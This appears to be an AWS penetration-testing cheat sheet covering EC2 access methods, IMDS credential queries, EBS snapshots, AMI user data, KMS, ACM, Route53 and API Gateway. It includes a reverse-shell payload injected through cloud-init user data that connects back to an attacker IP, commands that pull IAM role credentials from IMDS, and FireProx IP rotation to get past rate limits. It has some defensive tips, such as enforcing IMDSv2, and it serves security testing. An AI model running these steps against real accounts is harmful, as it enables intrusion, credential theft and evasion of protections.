https://console.aws.amazon.com/ec2/v2/connect/$USERNAME/$INSTANCE_ID

| Method | Network Access needed | Requires Agent | Requires IAM Permissions |
|---|---|---|---|
| SSH/RDP | YES | NO | NO |
| Instance Connect | YES | YES (Amazon Linux 2) | NO |
| SSM Run Command | NO | YES | YES |
| SSM Session Manager | NO | YES | YES |
| Serial Console | NO | Password needed | NO |

Instance Connect and the SSM Session Manager can be used to reset the root password via sudo passwd root. After that it is possible to connect as the root user, e.g. using the serial console, or to just use sudo su root or su root directly.

Connect to an EC2 Instance Using a Reverse Shell

The InstanceId has to be known, see Enumerate EC2 Instances to get these IDs.

Stop the machine using the InstanceId through aws cli.

aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID

Create a cloud-init script which contains the reverse shell. The file should contain something like the following example, so that it will be executed at boot time.

#cloud-boothook

#!/bin/bash -x

apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash

Encode the shellscript via base64.

base64 rev.txt > rev.b64
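Before uploading, it can be worth confirming that the encoded file decodes back to the original script. The following is a minimal sketch; the helper name `encode_userdata` is hypothetical, and stripping the line wraps from the base64 output is a choice made here to keep the value on a single line, not a documented requirement.

```shell
# Hypothetical helper: encode a script and confirm the result decodes back unchanged.
encode_userdata() {
    # $1: plain script, $2: output file for the base64 text
    # Remove line wraps so the encoded value is a single line.
    base64 < "$1" | tr -d '\n' > "$2"
    # Decode again and compare byte-for-byte with the input.
    base64 -d < "$2" | cmp -s - "$1"
}

# Usage: encode_userdata rev.txt rev.b64 && echo "rev.b64 is ready"
```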

Upload the encoded file to the stopped instance via aws cli.

aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64

Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to connect back.

aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID

EC2 and IAM

EC2 instances can use nearly any other service provided by AWS. There only needs to be access to the credentials. This can be done through the Instance MetaData Service (IMDS). The IMDS is available through HTTP on IP address 169.254.169.254 inside every EC2 instance.

Request Credentials through IMDS

There are two versions of IMDS in place right now. Regardless of the version, the name of a role needs to be requested through the IMDS using curl, which is then used to query the credentials for said role.

Query IMDSv1 Permissions

Query the name of the role via curl.

role_name=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)

Through the knowledge of the role name we can request the credentials of that role.

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/${role_name}

Query IMDSv2 Permissions

A session token is needed before the name of the role can be queried. Request it with a PUT request via curl.

TOKEN=$(curl -s -XPUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

The token is used to query the name of the role via curl.

role_name=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)

Both the token and the name of the role can then be used to request the credentials via curl.

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/${role_name}
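The returned JSON can be turned into environment variables so that the aws cli uses the role's credentials. This is a minimal sketch, assuming the response is flat JSON containing the `AccessKeyId`, `SecretAccessKey` and `Token` fields; the helper names `json_field` and `export_imds_creds` are hypothetical, and the sed-based parsing is a simplification (jq is the more robust choice).

```shell
# Hypothetical helper: pull one string field out of the credentials JSON.
# Assumption: flat JSON with "key" : "value" pairs; not a general JSON parser.
json_field() {
    # $1: field name; JSON is read from stdin
    sed -n 's/.*"'"$1"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# Hypothetical helper: export the credentials so the aws cli picks them up.
export_imds_creds() {
    # $1: JSON document returned by the security-credentials endpoint
    AWS_ACCESS_KEY_ID=$(printf '%s\n' "$1" | json_field AccessKeyId)
    AWS_SECRET_ACCESS_KEY=$(printf '%s\n' "$1" | json_field SecretAccessKey)
    AWS_SESSION_TOKEN=$(printf '%s\n' "$1" | json_field Token)
    export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN
}

# Usage, with $TOKEN and $role_name set as in the steps above:
# creds=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
#     "http://169.254.169.254/latest/meta-data/iam/security-credentials/${role_name}")
# export_imds_creds "$creds" && aws sts get-caller-identity
```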

PS: To enforce IMDSv2 on an instance, its instance ID is needed to activate it through aws cli.

instance_id=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)

region_name=<region_name>

aws ec2 modify-instance-metadata-options --instance-id $instance_id --http-tokens required --region $region_name

EC2 & Elastic Network Interface (ENI)

Every EC2 instance has at least one ENI to be made available on the network. There is a security group bound to each ENI to limit communication to the EC2 instance. Such security groups define, for example, which IP addresses can access the instance, on which ports, and which protocols can be used to access it.

List available ENIs through the webshell of the account.

aws ec2 describe-network-interfaces

EC2 & Elastic Block Storage (EBS)

An EC2 instance has EBS as its set block device, either SSD or HDD.

EBS storage is persistent and snapshots can be created from it. In contrast, other, ephemeral storage solutions cannot be snapshotted.

Snapshots can be created from EBS volumes and are stored in S3. Snapshots can be encrypted through KMS and can be shared across accounts.

Snapshots deliver a lot of useful content. List metadata of a snapshot via aws cli.

aws ec2 describe-snapshots --region <region> --snapshot-ids <snap-id>

This shows the size of the volume in GBs, state of the drive, encryption, ownerId and so on.

A snapshot can be used to create a volume. Snapshots are available in the whole region after they have been created, but a volume created from one needs to be placed in a specific AZ before it can be attached and mounted.

Create a volume from a snapshot through metadata service on an EC2 instance using the following commands.

Get the current AZ through a metadata token.

TOKEN=$(curl -s -XPUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token)

availability_zone=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/placement/availability-zone)

A volume can be created with the use of the snapshot-id, the type, the region and the previously gathered AZ.

aws ec2 create-volume --snapshot-id <snapshotId> --volume-type gp3 --region <region> --availability-zone $availability_zone

The output contains the VolumeId to attach the volume to an EC2 instance.

instance_id=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/instance-id)

aws ec2 attach-volume --region <region> --device /dev/sdh --instance-id $instance_id --volume-id <VolumeId>

Mount the created and attached device to the file system

lsblk

sudo mkdir /mnt/attached-volume

sudo mount /dev/<devicename> /mnt/attached-volume
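Once the volume is mounted, it can be searched for files that commonly hold secrets. The following is a minimal sketch; the helper name `find_interesting_files` and the list of file name patterns are illustrative assumptions and far from complete.

```shell
# Hypothetical helper: list files on a mounted volume that often hold secrets.
# Assumption: the name patterns are examples only.
find_interesting_files() {
    # $1: mount point, e.g. /mnt/attached-volume
    find "$1" -type f \( \
        -path '*/.aws/credentials' -o \
        -path '*/.ssh/id_*' -o \
        -name '.env' -o \
        -name '*.pem' -o \
        -name 'shadow' \
    \) 2>/dev/null
}

# Usage: sudo sh -c "$(declare -f find_interesting_files 2>/dev/null); find_interesting_files /mnt/attached-volume"
# or simply run the function as a user that can read the mount point.
```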

EC2 Amazon Machine Image (AMI) Configuration

An AMI is an image of a VM. This image can be configured before it is deployed via cloud-init scripts. These scripts may contain interesting data like credentials or other intel.

The files are stored in /var/lib/cloud/instance/scripts/

List all available or user specific AMIs on the account via aws cli.

aws ec2 describe-images

aws ec2 describe-images --owners <owner/account-id>

Get the configuration file contents through Instance Connect to the EC2 or through the SSM Session Manager via curl.

TOKEN=$(curl -s -XPUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token)

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data

Alternatively, use aws cli to get the configuration files.

TOKEN=$(curl -s -XPUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token)

instance_id=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/instance-id)

aws ec2 describe-instance-attribute --attribute userData --instance-id $instance_id --region <region> --query UserData.Value --output text | base64 -d

Restore an Amazon Machine Image (AMI)

An EC2 VM can be created from an Amazon Machine Image that is stored in an S3 bucket.

aws ec2 create-restore-image-task --object-key <AmiImageNameInsideTheBucket> --bucket <bucketname> --name <nameForEC2>

An ImageId will be returned. This ImageId is needed to launch the instance later.

Create a keypair to connect to the created VM via SSH. The keypair is registered for EC2 instances by aws cli automatically.

aws ec2 create-key-pair --key-name <key-name> --query "KeyMaterial" --output text > ./mykeys.pem

A subnet is needed for the creation of the EC2 instance, pick one via aws cli.

aws ec2 describe-subnets

Further, a security group with SSH access is needed.

aws ec2 describe-security-groups

Launch an instance using the gathered information.

aws ec2 run-instances --image-id <ImageIdOfGeneratedAMI> --instance-type t3a.micro --key-name <keyname> --subnet-id <subnetId> --security-group-ids <securityGroupId>

Take a look at the EC2 dashboard inside the webconsole to see the IP address of the created EC2 instance. Connect to the VM via SSH, using the generated keypair.
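The public IP address can also be read through aws cli instead of the webconsole. This is a minimal sketch, assuming the default profile and region are configured; the helper name `instance_public_ip` is hypothetical, and the `ec2-user` login name in the usage line is an assumption that depends on the AMI.

```shell
# Hypothetical helper: print the public IP address of an instance.
instance_public_ip() {
    # $1: instance id; relies on the configured default profile and region
    aws ec2 describe-instances --instance-ids "$1" \
        --query 'Reservations[].Instances[].PublicIpAddress' --output text
}

# Usage (the user name depends on the image and is an assumption here):
# ssh -i ./mykeys.pem ec2-user@"$(instance_public_ip i-0123456789abcdef0)"
```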

Elastic Loadbalancer (ELB)

- The AutoScaling Group (ASG) scales down the oldest instance.

- Only the Loadbalancer gets exposed, not the EC2 VMs.

- An ELB can terminate the TLS session.

- An Application ELB can have a WAF attached

List available load-balancers via aws cli.

aws elbv2 describe-load-balancers --query 'LoadBalancers[].DNSName' --output text

Encryption Services

Key Management Service (KMS)

Create encryption keys to be used on AWS services through their API. Encryption of storage can also be done through KMS keys.

A KMS key created in one account can be used in a second account as well. This means an attacker with sufficient privileges is able to (theoretically) lock you out of data encrypted with a key from another account. This can be mitigated through e.g. Object Versioning of an S3 bucket or MFA Delete.

Every KMS key has a (resource based) key policy attached to it. Therein, the Principal key-value pair is set to permit access to the key. If arn:aws:iam::<accountId>:root is set as Principal, every principal inside the account is able to use the key.

An identity based policy can also be set, where the KMS key is mentioned in the Resource list.
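A key policy can be scanned for such broad principals. The following is a minimal sketch, assuming the policy JSON is piped in as text; the helper name `flag_broad_principals` is hypothetical, and the plain text match neither parses the JSON nor evaluates any conditions.

```shell
# Hypothetical helper: flag broad principals in a key policy read from stdin.
# Assumption: a text match is good enough for a first look at the policy.
flag_broad_principals() {
    grep -n -E '"AWS"[[:space:]]*:[[:space:]]*"(\*|arn:aws:iam::[0-9]{12}:root)"|"Principal"[[:space:]]*:[[:space:]]*"\*"'
}

# Usage:
# aws kms get-key-policy --key-id <KeyId> --policy-name default --output text | flag_broad_principals
```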

Create a KMS Key

Create a KMS key using aws cli.

aws kms create-key

Create a Data Key

Use the created KMS key to create a data key via aws cli.

aws kms generate-data-key --key-id <KeyId> --number-of-bytes 32

AWS Certificate Manager (ACM)

Manage certificates for end-to-end encryption through TLS, which are then used by other AWS services.

Create an ACM TLS Certificate

Request a TLS certificate for a (sub-)domain via aws cli.

aws acm request-certificate --domain-name <AccountId>.example.org --validation-method DNS

Describe a Certificate

Details about a certificate can be queried via aws cli.

aws acm describe-certificate --certificate-arn <certificate-arn>

DNS & Route53

List hosted DNS zones in an account via aws cli.

aws route53 list-hosted-zones

Register a Domain via Certificate through Route53

A subdomain can be useful for regular users and an attacker alike.

Create a file named create_record.json containing certificate details from the aws acm description.

{
  "Comment": "subdomain.example.com record",
  "Changes": [
    {
      "Action": "CREATE",
      "ResourceRecordSet": {
        "Name": "<ResourceRecord/Name>",
        "Type": "CNAME",
        "TTL": 300,
        "ResourceRecords": [
          {
            "Value": "<ResourceRecord/Value>"
          }
        ]
      }
    }
  ]
}
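The change batch can also be generated from the two ACM values instead of being edited by hand. This is a minimal sketch; the helper name `make_cname_change` and the comment text are hypothetical, and the values are inserted without JSON escaping, which is assumed to be acceptable for plain DNS names.

```shell
# Hypothetical helper: print a CNAME change batch for a validation record.
# Assumption: name and value are plain DNS names that need no JSON escaping.
make_cname_change() {
    # $1: record name, $2: record value (both taken from the ACM ResourceRecord)
    cat <<EOF
{
  "Comment": "ACM validation record",
  "Changes": [
    {
      "Action": "CREATE",
      "ResourceRecordSet": {
        "Name": "$1",
        "Type": "CNAME",
        "TTL": 300,
        "ResourceRecords": [{ "Value": "$2" }]
      }
    }
  ]
}
EOF
}

# Usage: make_cname_change "<ResourceRecord/Name>" "<ResourceRecord/Value>" > create_record.json
```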

Create the record from the previously created file via aws cli.

aws route53 change-resource-record-sets --hosted-zone-id <ZoneId> --change-batch file://create_record.json

Check the status of the created record using the ChangeInfo ID from the last step via aws cli. The final status needs to be "INSYNC".

aws route53 get-change --id <ChangeInfo/Id>
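The status check can be repeated until the change has propagated. The following is a minimal sketch, assuming the default profile is configured; the helper name `wait_for_insync` and its default poll count and interval are hypothetical choices.

```shell
# Hypothetical helper: poll a Route53 change until it reports INSYNC.
wait_for_insync() {
    # $1: change id, $2: maximum number of polls (default 30),
    # $3: seconds to sleep between polls (default 10)
    tries=${2:-30}
    while [ "$tries" -gt 0 ]; do
        status=$(aws route53 get-change --id "$1" --query 'ChangeInfo.Status' --output text)
        [ "$status" = "INSYNC" ] && return 0
        tries=$((tries - 1))
        sleep "${3:-10}"
    done
    # The change did not reach INSYNC within the allowed number of polls.
    return 1
}

# Usage: wait_for_insync "<ChangeInfo/Id>" && echo "record is live"
```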

Describe the certificate to see the details via aws cli, like mentioned in the ACM chapter above.

API Gateway

An HTTP API consists of the following parts.

- HTTP Request Body

- HTTP Response

- Specific HTTP headers

- HTTP Method

- Endpoint the request is sent to

It acts as a serverless reverse proxy for other APIs. There is an option for real-time, bidirectional websocket connection, besides regular RESTlike HTTP(S) APIs.

Monitoring is an integrated part of the Gateway.

Data the API Gateway uses is stored in an S3 bucket or a DynamoDB.

Microservices can be used through the API Gateway as well.

Lambda Authorizer

Lambda acts as a service proxy for the API Gateway. The API Gateway can be attached to other AWS resources, e.g. Lambda. The Lambda authorizer can be used to check for credentials to other resources. Authorization can be done via regular IAM or OAuth2. The authorization can be customized for access.

A policy is set for authorization against resources. Watch out for * wildcards inside these Lambda authorizer policies, since they may grant unexpected permissions.

Use an API Gateway as a Reverse Proxy

Rotating IP addresses during an attack may bypass restrictions, like rate limiting, that are set per address. This can be done via VPNs or Tor or, more suitably in this case, by using the AWS API Gateway to rotate the IP address via FireProx.

Use the CloudShell inside a browser to clone and install the FireProx repository. Start fire.py afterwards.

You can use FireProx from outside of AWS, but you have to set an endpoint via a URL to achieve a connection.

./fire.py --command create --url <URL>

Either of these two setups lets you list existing APIs.

./fire.py --command list